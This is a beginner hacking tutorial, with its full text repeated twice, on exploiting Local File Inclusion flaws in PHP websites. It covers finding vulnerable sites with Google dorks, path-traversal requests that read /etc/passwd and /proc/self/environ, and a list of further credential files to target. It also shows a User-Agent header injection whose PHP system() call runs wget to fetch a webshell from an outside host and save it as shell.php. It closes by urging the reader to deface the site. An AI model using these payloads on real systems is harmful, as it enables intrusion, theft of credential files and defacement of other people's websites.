Beginer_tutorial
**** Hacking LFI vuln Websites ****
LFI stands for Local File Inclusion
LFI is the common website vunerability seen in most website like sql injection
This allows you to include your shell or malicious code in to the target webserver
THERE IS 6 PARTS OF THIS TUTORIAL:::
1 Introduction
2 Finding LFI VULN. WEBSITE
3 Checking if etc/passwd is accessible
4 Checking if proc/self/environ is accessible
5 Injecting malicious code (shell.php)
6 Accessing our shell
LET'S BEGIN....
1) Introduction
In this tutorial I show you how to upload a webshell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.
Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included. The vulnerability is also due to the use of user-supplied input without proper validation.
Is a step by step tutorial.
2) Finding LFI
YOU CAN USE GOOD GOOGLE DORK TO FIND LFI VULNERABLE WEBSITES
YOU CAN FIND MANY WEBSITES BUT ALL ARE NOT LFI VULNERABLE ....SO DON'T BE ANGRY..BE COOL
- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
EXAMPLE I CAN FIND WEBSITE NAME:
www.example.com/view.php?page=contact.php
NOW WE ARE GOING TO CHECK IF IT IS LFI VULNERABLE OR NOT.....FOR THAT WE CAN REPLACE contact.php WITH ../ SO URL BECOME
www.example.com/view.php?page=../
AND WE GOT AN ERROR
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
IF YOU GOT AN ERROR THEN IT IS LFI VULNERABLE ...AND IF YOU CAN NOT GET ERROR OR IF YOU GET BLANK PAGE THEN IT'S NOT LFI VULNERABLE...
3) Checking if etc/passwd is accessible
Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
www.example.com/view.php?page=../../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
SO WE GO MORE DIRECTORIES UP
www.example.com/view.php?page=../../../../../etc/passwd
we successfully included the etc/passwd file.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
THERE ARE ALSO GOOD DIRECTORIES THAT YOU CAN VISIT::
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
4) Checking if proc/self/environ is accessible
- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ
www.example.com/view.php?page=../../../../../proc/self/environ
IF YOU GET SOMETHING LIKE THIS
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80
proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
5) Injecting malicious code
- Now lets inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :
www.example.com/view.php?page=../../../../../proc/self/environ
Choose Tamperdata and in User-Agent, write the following code : TAMPER DATA IS AN ADDON OF MOZILLA FIREFOX ..JUST GOOGLE IT YOU FIND IT...
<?system('wget http://www.example-remoteshell.com/shell.txt -O shell.php');?>
("NOTE: USE A REMOTE WEBSITE WHICH PROVIDE A SHELL OR USE YOUR OWN LOCAL SERVER for wget url")
Our command will be executed (will download the txt shell from http://www.zer0w0rm.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.
If don't work,try exec() because system() can be disabled on the webserver from php.ini
HERE "http://www.example-remoteshell.com/shell.txt" IS A LOCATION OF YOUR SHELL...WHICH YOU HAVE TO PUT IN TXT FILE..
IT IS NOT NECESSORAY TO UPLOAD YOUR SHELL ON DRIVE HQ...
WHAT THIS CODE DO IS UPLOAD YOU TXT FILE TO LFI VULNERABLE WEBSITE AS shell.php
6) Access our shell
- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.
www.example.com/shell.php
OUR SHELL IS THERE, INJECTION IS SUCCESSFULLY.... :D
NOW DEFACE (Y)
**** Hacking LFI vuln Websites ****
LFI stands for Local File Inclusion
LFI is the common website vunerability seen in most website like sql injection
This allows you to include your shell or malicious code in to the target webserver
THERE IS 6 PARTS OF THIS TUTORIAL:::
1 Introduction
2 Finding LFI VULN. WEBSITE
3 Checking if etc/passwd is accessible
4 Checking if proc/self/environ is accessible
5 Injecting malicious code (shell.php)
6 Accessing our shell
LET'S BEGIN....
1) Introduction
In this tutorial I show you how to upload a webshell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.
Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included. The vulnerability is also due to the use of user-supplied input without proper validation.
Is a step by step tutorial.
2) Finding LFI
YOU CAN USE GOOD GOOGLE DORK TO FIND LFI VULNERABLE WEBSITES
YOU CAN FIND MANY WEBSITES BUT ALL ARE NOT LFI VULNERABLE ....SO DON'T BE ANGRY..BE COOL
- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
EXAMPLE I CAN FIND WEBSITE NAME:
www.example.com/view.php?page=contact.php
NOW WE ARE GOING TO CHECK IF IT IS LFI VULNERABLE OR NOT.....FOR THAT WE CAN REPLACE contact.php WITH ../ SO URL BECOME
www.example.com/view.php?page=../
AND WE GOT AN ERROR
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
IF YOU GOT AN ERROR THEN IT IS LFI VULNERABLE ...AND IF YOU CAN NOT GET ERROR OR IF YOU GET BLANK PAGE THEN IT'S NOT LFI VULNERABLE...
3) Checking if etc/passwd is accessible
Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
www.example.com/view.php?page=../../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
SO WE GO MORE DIRECTORIES UP
www.example.com/view.php?page=../../../../../etc/passwd
we successfully included the etc/passwd file.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
THERE ARE ALSO GOOD DIRECTORIES THAT YOU CAN VISIT::
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
4) Checking if proc/self/environ is accessible
- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ
www.example.com/view.php?page=../../../../../proc/self/environ
IF YOU GET SOMETHING LIKE THIS
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80
proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
5) Injecting malicious code
- Now lets inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :
www.example.com/view.php?page=../../../../../proc/self/environ
Choose Tamperdata and in User-Agent, write the following code : TAMPER DATA IS AN ADDON OF MOZILLA FIREFOX ..JUST GOOGLE IT YOU FIND IT...
<?system('wget http://www.example-remoteshell.com/shell.txt -O shell.php');?>
("NOTE: USE A REMOTE WEBSITE WHICH PROVIDE A SHELL OR USE YOUR OWN LOCAL SERVER for wget url")
Our command will be executed (will download the txt shell from http://www.zer0w0rm.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.
If don't work,try exec() because system() can be disabled on the webserver from php.ini
HERE "http://www.example-remoteshell.com/shell.txt" IS A LOCATION OF YOUR SHELL...WHICH YOU HAVE TO PUT IN TXT FILE..
IT IS NOT NECESSORAY TO UPLOAD YOUR SHELL ON DRIVE HQ...
WHAT THIS CODE DO IS UPLOAD YOU TXT FILE TO LFI VULNERABLE WEBSITE AS shell.php
6) Access our shell
- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.
www.example.com/shell.php
OUR SHELL IS THERE, INJECTION IS SUCCESSFULLY.... :D
NOW DEFACE (Y)
